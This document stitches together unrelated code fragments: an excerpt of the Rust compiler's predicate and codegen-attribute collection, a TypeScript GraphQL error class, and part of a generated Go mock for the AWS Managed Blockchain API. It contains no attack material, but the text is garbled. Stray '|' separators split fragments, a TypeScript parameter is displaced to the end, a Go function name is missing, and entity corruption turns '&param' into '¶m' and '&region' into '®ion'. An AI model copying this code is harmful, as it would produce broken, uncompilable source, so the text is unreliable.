// method like `Trait::method(...)`, you must naturally
// prove that the trait applies to the types that were
// used, and adding the predicate into this list ensures
// that this is done.
predicates.push(ty::TraitRef::identity(tcx, def_id).to_predicate());
}
ty::GenericPredicates { parent, predicates }
}
fn explicit_predicates_of<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
) -> ty::GenericPredicates<'tcx> {
use rustc::hir::*;
debug!("explicit_predicates_of(def_id={:?})", def_id);
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let node = tcx.hir.get(node_id);
let mut is_trait = None;
let mut is_default_impl_trait = None;
let icx = ItemCtxt::new(tcx, def_id);
let no_generics = hir::Generics::empty();
let mut predicates = vec![];
let ast_generics = match node {
Node::TraitItem(item) => &item.generics,
Node::ImplItem(item) => match item.node {
ImplItemKind::Existential(ref bounds) => {
let substs = Substs::identity_for_item(tcx, def_id);
let anon_ty = tcx.mk_anon(def_id, substs);
// Collect the bounds, i.e. the `A+B+'c` in `impl A+B+'c`.
let bounds = compute_bounds(
&icx,
anon_ty,
bounds,
SizedByDefault::Yes,
tcx.def_span(def_id),
);
predicates.extend(bounds.predicates(tcx, anon_ty));
&item.generics
}
_ => &item.generics,
},
Node::Item(item) => {
match item.node {
ItemKind::Impl(_, _, defaultness, ref generics, ..) => {
if defaultness.is_default() {
is_default_impl_trait = tcx.impl_trait_ref(def_id);
}
generics
}
ItemKind::Fn(.., ref generics, _)
| ItemKind::Ty(_, ref generics)
| ItemKind::Enum(_, ref generics)
| ItemKind::Struct(_, ref generics)
| ItemKind::Union(_, ref generics) => generics,
ItemKind::Trait(_, _, ref generics, .., ref items) => {
is_trait = Some((ty::TraitRef::identity(tcx, def_id), items));
generics
}
ItemKind::Existential(ExistTy {
ref bounds,
impl_trait_fn,
ref generics,
}) => {
let substs = Substs::identity_for_item(tcx, def_id);
let anon_ty = tcx.mk_anon(def_id, substs);
// Collect the bounds, i.e. the `A+B+'c` in `impl A+B+'c`.
let bounds = compute_bounds(
&icx,
anon_ty,
bounds,
SizedByDefault::Yes,
tcx.def_span(def_id),
);
if impl_trait_fn.is_some() {
// impl Trait
return ty::GenericPredicates {
parent: None,
predicates: bounds.predicates(tcx, anon_ty),
};
} else {
// named existential types
predicates.extend(bounds.predicates(tcx, anon_ty));
generics
}
}
_ => &no_generics,
}
}
Node::ForeignItem(item) => match item.node {
ForeignItemKind::Static(..) => &no_generics,
ForeignItemKind::Fn(_, _, ref generics) => generics,
ForeignItemKind::Type => &no_generics,
},
_ => &no_generics,
};
let generics = tcx.generics_of(def_id);
let parent_count = generics.parent_count as u32;
let has_own_self = generics.has_self && parent_count == 0;
// Below we'll consider the bounds on the type parameters (including `Self`)
// and the explicit where-clauses, but to get the full set of predicates
// on a trait we need to add in the supertrait bounds and bounds found on
// associated types.
if let Some((_trait_ref, _)) = is_trait {
predicates = tcx.super_predicates_of(def_id).predicates;
}
// In default impls, we can assume that the self type implements
// the trait. So in:
//
// default impl Foo for Bar { .. }
//
// we add a default where clause `Foo: Bar`. We do a similar thing for traits
// (see below). Recall that a default impl is not itself an impl, but rather a
// set of defaults that can be incorporated into another impl.
if let Some(trait_ref) = is_default_impl_trait {
predicates.push(trait_ref.to_poly_trait_ref().to_predicate());
}
// Collect the region predicates that were declared inline as
// well. In the case of parameters declared on a fn or method, we
// have to be careful to only iterate over early-bound regions.
let mut index = parent_count + has_own_self as u32;
for param in early_bound_lifetimes_from_generics(tcx, ast_generics) {
let region = tcx.mk_region(ty::ReEarlyBound(ty::EarlyBoundRegion {
def_id: tcx.hir.local_def_id(param.id),
index,
name: param.name.ident().as_interned_str(),
}));
index += 1;
match param.kind {
GenericParamKind::Lifetime { .. } => {
param.bounds.iter().for_each(|bound| match bound {
hir::GenericBound::Outlives(lt) => {
let bound = AstConv::ast_region_to_region(&icx, <, None);
let outlives = ty::Binder::bind(ty::OutlivesPredicate(region, bound));
predicates.push(outlives.to_predicate());
}
_ => bug!(),
});
}
_ => bug!(),
}
}
// Collect the predicates that were written inline by the user on each
// type parameter (e.g., `<T:Foo>`).
for param in &ast_generics.params {
match param.kind {
GenericParamKind::Type { .. } => {
let name = param.name.ident().as_interned_str();
let param_ty = ty::ParamTy::new(index, name).to_ty(tcx);
index += 1;
let sized = SizedByDefault::Yes;
let bounds = compute_bounds(&icx, param_ty, ¶m.bounds, sized, param.span);
predicates.extend(bounds.predicates(tcx, param_ty));
}
_ => {}
}
}
// Add in the bounds that appear in the where-clause
let where_clause = &ast_generics.where_clause;
for predicate in &where_clause.predicates {
match predicate {
&hir::WherePredicate::BoundPredicate(ref bound_pred) => {
let ty = icx.to_ty(&bound_pred.bounded_ty);
// Keep the type around in a WF predicate, in case of no bounds.
// That way, `where Ty:` is not a complete noop (see #53696).
if bound_pred.bounds.is_empty() {
if let ty::Param(_) = ty.sty {
// This is a `where T:`, which can be in the HIR from the
// transformation that moves `?Sized` to `T`'s declaration.
// We can skip the predicate because type parameters are
// trivially WF, but also we *should*, to avoid exposing
// users who never wrote `where Type:,` themselves, to
// compiler/tooling bugs from not handling WF predicates.
} else {
predicates.push(ty::Predicate::WellFormed(ty));
}
}
for bound in bound_pred.bounds.iter() {
match bound {
&hir::GenericBound::Trait(ref poly_trait_ref, _) => {
let mut projections = Vec::new();
let trait_ref = AstConv::instantiate_poly_trait_ref(
&icx,
poly_trait_ref,
ty,
&mut projections,
);
predicates.push(trait_ref.to_predicate());
predicates.extend(projections.iter().map(|p| p.to_predicate()));
}
&hir::GenericBound::Outlives(ref lifetime) => {
let region = AstConv::ast_region_to_region(&icx, lifetime, None);
let pred = ty::Binder::bind(ty::OutlivesPredicate(ty, region));
predicates.push(ty::Predicate::TypeOutlives(pred))
}
}
}
}
&hir::WherePredicate::RegionPredicate(ref region_pred) => {
let r1 = AstConv::ast_region_to_region(&icx, ®ion_pred.lifetime, None);
for bound in ®ion_pred.bounds {
let r2 = match bound {
hir::GenericBound::Outlives(lt) => {
AstConv::ast_region_to_region(&icx, lt, None)
}
_ => bug!(),
};
let pred = ty::Binder::bind(ty::OutlivesPredicate(r1, r2));
predicates.push(ty::Predicate::RegionOutlives(pred))
}
}
&hir::WherePredicate::EqPredicate(..) => {
// FIXME(#20041)
}
}
}
// Add predicates from associated type bounds.
if let Some((self_trait_ref, trait_items)) = is_trait {
predicates.extend(trait_items.iter().flat_map(|trait_item_ref| {
let trait_item = tcx.hir.trait_item(trait_item_ref.id);
let bounds = match trait_item.node {
hir::TraitItemKind::Type(ref bounds, _) => bounds,
_ => {
return vec![].into_iter();
}
};
let assoc_ty =
tcx.mk_projection(tcx.hir.local_def_id(trait_item.id), self_trait_ref.substs);
let bounds = compute_bounds(
&ItemCtxt::new(tcx, def_id),
assoc_ty,
bounds,
SizedByDefault::Yes,
trait_item.span,
);
bounds.predicates(tcx, assoc_ty).into_iter()
}))
}
// Subtle: before we store the predicates into the tcx, we
// sort them so that predicates like `T: Foo<Item=U>` come
// before uses of `U`. This avoids false ambiguity errors
// in trait checking. See `setup_constraining_predicates`
// for details.
if let Node::Item(&Item {
node: ItemKind::Impl(..),
..
}) = node
{
let self_ty = tcx.type_of(def_id);
let trait_ref = tcx.impl_trait_ref(def_id);
ctp::setup_constraining_predicates(
tcx,
&mut predicates,
trait_ref,
&mut ctp::parameters_for_impl(self_ty, trait_ref),
);
}
ty::GenericPredicates {
parent: generics.parent,
predicates,
}
}
pub enum SizedByDefault {
Yes,
No,
}
/// Translate the AST's notion of ty param bounds (which are an enum consisting of a newtyped Ty or
/// a region) to ty's notion of ty param bounds, which can either be user-defined traits, or the
/// built-in trait (formerly known as kind): Send.
pub fn compute_bounds<'gcx: 'tcx, 'tcx>(
astconv: &dyn AstConv<'gcx, 'tcx>,
param_ty: Ty<'tcx>,
ast_bounds: &[hir::GenericBound],
sized_by_default: SizedByDefault,
span: Span,
) -> Bounds<'tcx> {
let mut region_bounds = vec![];
let mut trait_bounds = vec![];
for ast_bound in ast_bounds {
match *ast_bound {
hir::GenericBound::Trait(ref b, hir::TraitBoundModifier::None) => trait_bounds.push(b),
hir::GenericBound::Trait(_, hir::TraitBoundModifier::Maybe) => {}
hir::GenericBound::Outlives(ref l) => region_bounds.push(l),
}
}
let mut projection_bounds = vec![];
let mut trait_bounds: Vec<_> = trait_bounds
.iter()
.map(|&bound| astconv.instantiate_poly_trait_ref(bound, param_ty, &mut projection_bounds))
.collect();
let region_bounds = region_bounds
.into_iter()
.map(|r| astconv.ast_region_to_region(r, None))
.collect();
trait_bounds.sort_by_key(|t| t.def_id());
let implicitly_sized = if let SizedByDefault::Yes = sized_by_default {
!is_unsized(astconv, ast_bounds, span)
} else {
false
};
Bounds {
region_bounds,
implicitly_sized,
trait_bounds,
projection_bounds,
}
}
/// Converts a specific GenericBound from the AST into a set of
/// predicates that apply to the self-type. A vector is returned
/// because this can be anywhere from 0 predicates (`T:?Sized` adds no
/// predicates) to 1 (`T:Foo`) to many (`T:Bar<X=i32>` adds `T:Bar`
/// and `<T as Bar>::X == i32`).
fn predicates_from_bound<'tcx>(
astconv: &dyn AstConv<'tcx, 'tcx>,
param_ty: Ty<'tcx>,
bound: &hir::GenericBound,
) -> Vec<ty::Predicate<'tcx>> {
match *bound {
hir::GenericBound::Trait(ref tr, hir::TraitBoundModifier::None) => {
let mut projections = Vec::new();
let pred = astconv.instantiate_poly_trait_ref(tr, param_ty, &mut projections);
projections
.into_iter()
.map(|p| p.to_predicate())
.chain(Some(pred.to_predicate()))
.collect()
}
hir::GenericBound::Outlives(ref lifetime) => {
let region = astconv.ast_region_to_region(lifetime, None);
let pred = ty::Binder::bind(ty::OutlivesPredicate(param_ty, region));
vec![ty::Predicate::TypeOutlives(pred)]
}
hir::GenericBound::Trait(_, hir::TraitBoundModifier::Maybe) => vec![],
}
}
fn compute_sig_of_foreign_fn_decl<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
decl: &hir::FnDecl,
abi: abi::Abi,
) -> ty::PolyFnSig<'tcx> {
let unsafety = if abi == abi::Abi::RustIntrinsic {
match &*tcx.item_name(def_id).as_str() {
"size_of" | "min_align_of" => hir::Unsafety::Normal,
_ => hir::Unsafety::Unsafe,
}
} else {
hir::Unsafety::Unsafe
};
let fty = AstConv::ty_of_fn(&ItemCtxt::new(tcx, def_id), unsafety, abi, decl);
// feature gate SIMD types in FFI, since I (huonw) am not sure the
// ABIs are handled at all correctly.
if abi != abi::Abi::RustIntrinsic
&& abi != abi::Abi::PlatformIntrinsic
&& !tcx.features().simd_ffi
{
let check = |ast_ty: &hir::Ty, ty: Ty| {
if ty.is_simd() {
tcx.sess
.struct_span_err(
ast_ty.span,
&format!(
"use of SIMD type `{}` in FFI is highly experimental and \
may result in invalid code",
tcx.hir.node_to_pretty_string(ast_ty.id)
),
)
.help("add #![feature(simd_ffi)] to the crate attributes to enable")
.emit();
}
};
for (input, ty) in decl.inputs.iter().zip(*fty.inputs().skip_binder()) {
check(&input, ty)
}
if let hir::Return(ref ty) = decl.output {
check(&ty, *fty.output().skip_binder())
}
}
fty
}
fn is_foreign_item<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> bool {
match tcx.hir.get_if_local(def_id) {
Some(Node::ForeignItem(..)) => true,
Some(_) => false,
_ => bug!("is_foreign_item applied to non-local def-id {:?}", def_id),
}
}
fn from_target_feature(
tcx: TyCtxt,
id: DefId,
attr: &ast::Attribute,
whitelist: &FxHashMap<String, Option<String>>,
target_features: &mut Vec<Symbol>,
) {
let list = match attr.meta_item_list() {
Some(list) => list,
None => {
let msg = "#[target_feature] attribute must be of the form \
#[target_feature(..)]";
tcx.sess.span_err(attr.span, &msg);
return;
}
};
let rust_features = tcx.features();
for item in list {
// Only `enable = ...` is accepted in the meta item list
if !item.check_name("enable") {
let msg = "#[target_feature(..)] only accepts sub-keys of `enable` \
currently";
tcx.sess.span_err(item.span, &msg);
continue;
}
// Must be of the form `enable = "..."` ( a string)
let value = match item.value_str() {
Some(value) => value,
None => {
let msg = "#[target_feature] attribute must be of the form \
#[target_feature(enable = \"..\")]";
tcx.sess.span_err(item.span, &msg);
continue;
}
};
// We allow comma separation to enable multiple features
for feature in value.as_str().split(',') {
// Only allow whitelisted features per platform
let feature_gate = match whitelist.get(feature) {
Some(g) => g,
None => {
let msg = format!(
"the feature named `{}` is not valid for \
this target",
feature
);
let mut err = tcx.sess.struct_span_err(item.span, &msg);
if feature.starts_with("+") {
let valid = whitelist.contains_key(&feature[1..]);
if valid {
err.help("consider removing the leading `+` in the feature name");
}
}
err.emit();
continue;
}
};
// Only allow features whose feature gates have been enabled
let allowed = match feature_gate.as_ref().map(|s| &**s) {
Some("arm_target_feature") => rust_features.arm_target_feature,
Some("aarch64_target_feature") => rust_features.aarch64_target_feature,
Some("hexagon_target_feature") => rust_features.hexagon_target_feature,
Some("powerpc_target_feature") => rust_features.powerpc_target_feature,
Some("mips_target_feature") => rust_features.mips_target_feature,
Some("avx512_target_feature") => rust_features.avx512_target_feature,
Some("mmx_target_feature") => rust_features.mmx_target_feature,
Some("sse4a_target_feature") => rust_features.sse4a_target_feature,
Some("tbm_target_feature") => rust_features.tbm_target_feature,
Some("wasm_target_feature") => rust_features.wasm_target_feature,
Some(name) => bug!("unknown target feature gate {}", name),
None => true,
};
if !allowed && id.is_local() {
feature_gate::emit_feature_err(
&tcx.sess.parse_sess,
feature_gate.as_ref().unwrap(),
item.span,
feature_gate::GateIssue::Language,
&format!("the target feature `{}` is currently unstable", feature),
);
continue;
}
target_features.push(Symbol::intern(feature));
}
}
}
fn linkage_by_name<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId, name: &str) -> Linkage {
use rustc::mir::mono::Linkage::*;
// Use the names from src/llvm/docs/LangRef.rst here. Most types are only
// applicable to variable declarations and may not really make sense for
// Rust code in the first place but whitelist them anyway and trust that
// the user knows what s/he's doing. Who knows, unanticipated use cases
// may pop up in the future.
//
// ghost, dllimport, dllexport and linkonce_odr_autohide are not supported
// and don't have to be, LLVM treats them as no-ops.
match name {
"appending" => Appending,
"available_externally" => AvailableExternally,
"common" => Common,
"extern_weak" => ExternalWeak,
"external" => External,
"internal" => Internal,
"linkonce" => LinkOnceAny,
"linkonce_odr" => LinkOnceODR,
"private" => Private,
"weak" => WeakAny,
"weak_odr" => WeakODR,
_ => {
let span = tcx.hir.span_if_local(def_id);
if let Some(span) = span {
tcx.sess.span_fatal(span, "invalid linkage specified")
} else {
tcx.sess
.fatal(&format!("invalid linkage specified: {}", name))
}
}
}
}
fn codegen_fn_attrs<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, id: DefId) -> CodegenFnAttrs {
let attrs = tcx.get_attrs(id);
let mut codegen_fn_attrs = CodegenFnAttrs::new();
let whitelist = tcx.target_features_whitelist(LOCAL_CRATE);
let mut inline_span = None;
for attr in attrs.iter() {
if attr.check_name("cold") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::COLD;
} else if attr.check_name("allocator") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::ALLOCATOR;
} else if attr.check_name("unwind") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::UNWIND;
} else if attr.check_name("rustc_allocator_nounwind") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::RUSTC_ALLOCATOR_NOUNWIND;
} else if attr.check_name("naked") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::NAKED;
} else if attr.check_name("no_mangle") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::NO_MANGLE;
} else if attr.check_name("rustc_std_internal_symbol") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::RUSTC_STD_INTERNAL_SYMBOL;
} else if attr.check_name("no_debug") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::NO_DEBUG;
} else if attr.check_name("used") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::USED;
} else if attr.check_name("thread_local") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::THREAD_LOCAL;
} else if attr.check_name("inline") {
codegen_fn_attrs.inline = attrs.iter().fold(InlineAttr::None, |ia, attr| {
if attr.path != "inline" {
return ia;
}
let meta = match attr.meta() {
Some(meta) => meta.node,
None => return ia,
};
match meta {
MetaItemKind::Word => {
mark_used(attr);
InlineAttr::Hint
}
MetaItemKind::List(ref items) => {
mark_used(attr);
inline_span = Some(attr.span);
if items.len() != 1 {
span_err!(
tcx.sess.diagnostic(),
attr.span,
E0534,
"expected one argument"
);
InlineAttr::None
} else if list_contains_name(&items[..], "always") {
InlineAttr::Always
} else if list_contains_name(&items[..], "never") {
InlineAttr::Never
} else {
span_err!(
tcx.sess.diagnostic(),
items[0].span,
E0535,
"invalid argument"
);
InlineAttr::None
}
}
_ => ia,
}
});
} else if attr.check_name("export_name") {
if let Some(s) = attr.value_str() {
if s.as_str().contains("\0") {
// `#[export_name = ...]` will be converted to a null-terminated string,
// so it may not contain any null characters.
struct_span_err!(
tcx.sess,
attr.span,
E0648,
"`export_name` may not contain null characters"
).emit();
}
codegen_fn_attrs.export_name = Some(s);
} else {
struct_span_err!(
tcx.sess,
attr.span,
E0558,
"`export_name` attribute has invalid format"
).span_label(attr.span, "did you mean #[export_name=\"*\"]?")
.emit();
}
} else if attr.check_name("target_feature") {
if tcx.fn_sig(id).unsafety() == Unsafety::Normal {
let msg = "#[target_feature(..)] can only be applied to \
`unsafe` function";
tcx.sess.span_err(attr.span, msg);
}
from_target_feature(
tcx,
id,
attr,
&whitelist,
&mut codegen_fn_attrs.target_features,
);
} else if attr.check_name("linkage") {
if let Some(val) = attr.value_str() {
codegen_fn_attrs.linkage = Some(linkage_by_name(tcx, id, &val.as_str()));
}
} else if attr.check_name("link_section") {
if let Some(val) = attr.value_str() {
if val.as_str().bytes().any(|b| b == 0) {
let msg = format!(
"illegal null byte in link_section \
value: `{}`",
&val
);
tcx.sess.span_err(attr.span, &msg);
} else {
codegen_fn_attrs.link_section = Some(val);
}
}
} else if attr.check_name("link_name") {
codegen_fn_attrs.link_name = attr.value_str();
}
}
// If a function uses #[target_feature] it can't be inlined into general
// purpose functions as they wouldn't have the right target features
// enabled. For that reason we also forbid #[inline(always)] as it can't be
// respected.
if codegen_fn_attrs.target_features.len() > 0 {
if codegen_fn_attrs.inline == InlineAttr::Always {
if let Some(span) = inline_span {
tcx.sess.span_err(
span,
"cannot use #[inline(always)] with \
#[target_feature]",
);
}
}
}
// Weak lang items have the same semantics as "std internal" symbols in the
// sense that they're preserved through all our LTO passes and only
// strippable by the linker.
//
// Additionally weak lang items have predetermined symbol names.
if tcx.is_weak_lang_item(id) {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::RUSTC_STD_INTERNAL_SYMBOL;
}
if let Some(name) = weak_lang_items::link_name(&attrs) {
codegen_fn_attrs.export_name = Some(name);
codegen_fn_attrs.link_name = Some(name);
}
// Internal symbols to the standard library all have no_mangle semantics in
// that they have defined symbol names present in the function name. This
// also applies to weak symbols where they all have known symbol names.
if codegen_fn_attrs.flags.contains(CodegenFnAttrFlags::RUSTC_STD_INTERNAL_SYMBOL) {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::NO_MANGLE;
}
codegen_fn_attrs
}
| {
NestedVisitorMap::OnlyBodies(&self.tcx.hir)
} |
CannotDetermineGraphQLTypeError.ts | export class CannotDetermineGraphQLTypeError extends Error {
constructor(
typeKind: 'input' | 'output',
typeName: string,
propertyKey: string, | argName?: string
) {
let errorMessage = `Cannot determine GraphQL ${typeKind} type for `
if (argName) {
errorMessage += `argument named '${argName}' of `
} else if (parameterIndex !== undefined) {
errorMessage += `parameter #${parameterIndex} of `
}
errorMessage +=
`'${propertyKey}' of '${typeName}' class. ` +
`Is the value, that is used as its TS type or explicit type, decorated with a proper ` +
`decorator or is it a proper ${typeKind} value?`
super(errorMessage)
Object.setPrototypeOf(this, new.target.prototype)
}
} | parameterIndex?: number, |
mock.go | // Code generated by MockGen. DO NOT EDIT.
// Source: github.com/aws/aws-sdk-go/service/managedblockchain/managedblockchainiface (interfaces: ManagedBlockchainAPI)
// Package managedblockchainmock is a generated GoMock package.
package managedblockchainmock
import (
context "context"
reflect "reflect"
request "github.com/aws/aws-sdk-go/aws/request"
managedblockchain "github.com/aws/aws-sdk-go/service/managedblockchain"
gomock "github.com/golang/mock/gomock"
)
// MockManagedBlockchainAPI is a mock of ManagedBlockchainAPI interface.
type MockManagedBlockchainAPI struct {
ctrl *gomock.Controller
recorder *MockManagedBlockchainAPIMockRecorder
}
// MockManagedBlockchainAPIMockRecorder is the mock recorder for MockManagedBlockchainAPI.
type MockManagedBlockchainAPIMockRecorder struct {
mock *MockManagedBlockchainAPI
}
// NewMockManagedBlockchainAPI creates a new mock instance.
func | (ctrl *gomock.Controller) *MockManagedBlockchainAPI {
mock := &MockManagedBlockchainAPI{ctrl: ctrl}
mock.recorder = &MockManagedBlockchainAPIMockRecorder{mock}
return mock
}
// EXPECT returns an object that allows the caller to indicate expected use.
func (m *MockManagedBlockchainAPI) EXPECT() *MockManagedBlockchainAPIMockRecorder {
return m.recorder
}
// CreateMember mocks base method.
func (m *MockManagedBlockchainAPI) CreateMember(arg0 *managedblockchain.CreateMemberInput) (*managedblockchain.CreateMemberOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateMember", arg0)
ret0, _ := ret[0].(*managedblockchain.CreateMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateMember indicates an expected call of CreateMember.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateMember(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateMember", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateMember), arg0)
}
// CreateMemberRequest mocks base method.
func (m *MockManagedBlockchainAPI) CreateMemberRequest(arg0 *managedblockchain.CreateMemberInput) (*request.Request, *managedblockchain.CreateMemberOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateMemberRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.CreateMemberOutput)
return ret0, ret1
}
// CreateMemberRequest indicates an expected call of CreateMemberRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateMemberRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateMemberRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateMemberRequest), arg0)
}
// CreateMemberWithContext mocks base method.
func (m *MockManagedBlockchainAPI) CreateMemberWithContext(arg0 context.Context, arg1 *managedblockchain.CreateMemberInput, arg2 ...request.Option) (*managedblockchain.CreateMemberOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "CreateMemberWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.CreateMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateMemberWithContext indicates an expected call of CreateMemberWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateMemberWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateMemberWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateMemberWithContext), varargs...)
}
// CreateNetwork mocks base method.
func (m *MockManagedBlockchainAPI) CreateNetwork(arg0 *managedblockchain.CreateNetworkInput) (*managedblockchain.CreateNetworkOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateNetwork", arg0)
ret0, _ := ret[0].(*managedblockchain.CreateNetworkOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateNetwork indicates an expected call of CreateNetwork.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNetwork(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNetwork", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNetwork), arg0)
}
// CreateNetworkRequest mocks base method.
func (m *MockManagedBlockchainAPI) CreateNetworkRequest(arg0 *managedblockchain.CreateNetworkInput) (*request.Request, *managedblockchain.CreateNetworkOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateNetworkRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.CreateNetworkOutput)
return ret0, ret1
}
// CreateNetworkRequest indicates an expected call of CreateNetworkRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNetworkRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNetworkRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNetworkRequest), arg0)
}
// CreateNetworkWithContext mocks base method.
func (m *MockManagedBlockchainAPI) CreateNetworkWithContext(arg0 context.Context, arg1 *managedblockchain.CreateNetworkInput, arg2 ...request.Option) (*managedblockchain.CreateNetworkOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "CreateNetworkWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.CreateNetworkOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateNetworkWithContext indicates an expected call of CreateNetworkWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNetworkWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNetworkWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNetworkWithContext), varargs...)
}
// CreateNode mocks base method.
func (m *MockManagedBlockchainAPI) CreateNode(arg0 *managedblockchain.CreateNodeInput) (*managedblockchain.CreateNodeOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateNode", arg0)
ret0, _ := ret[0].(*managedblockchain.CreateNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateNode indicates an expected call of CreateNode.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNode(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNode", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNode), arg0)
}
// CreateNodeRequest mocks base method.
func (m *MockManagedBlockchainAPI) CreateNodeRequest(arg0 *managedblockchain.CreateNodeInput) (*request.Request, *managedblockchain.CreateNodeOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateNodeRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.CreateNodeOutput)
return ret0, ret1
}
// CreateNodeRequest indicates an expected call of CreateNodeRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNodeRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNodeRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNodeRequest), arg0)
}
// CreateNodeWithContext mocks base method.
func (m *MockManagedBlockchainAPI) CreateNodeWithContext(arg0 context.Context, arg1 *managedblockchain.CreateNodeInput, arg2 ...request.Option) (*managedblockchain.CreateNodeOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "CreateNodeWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.CreateNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateNodeWithContext indicates an expected call of CreateNodeWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNodeWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNodeWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNodeWithContext), varargs...)
}
// CreateProposal mocks base method.
func (m *MockManagedBlockchainAPI) CreateProposal(arg0 *managedblockchain.CreateProposalInput) (*managedblockchain.CreateProposalOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateProposal", arg0)
ret0, _ := ret[0].(*managedblockchain.CreateProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateProposal indicates an expected call of CreateProposal.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateProposal(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateProposal", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateProposal), arg0)
}
// CreateProposalRequest mocks base method.
func (m *MockManagedBlockchainAPI) CreateProposalRequest(arg0 *managedblockchain.CreateProposalInput) (*request.Request, *managedblockchain.CreateProposalOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateProposalRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.CreateProposalOutput)
return ret0, ret1
}
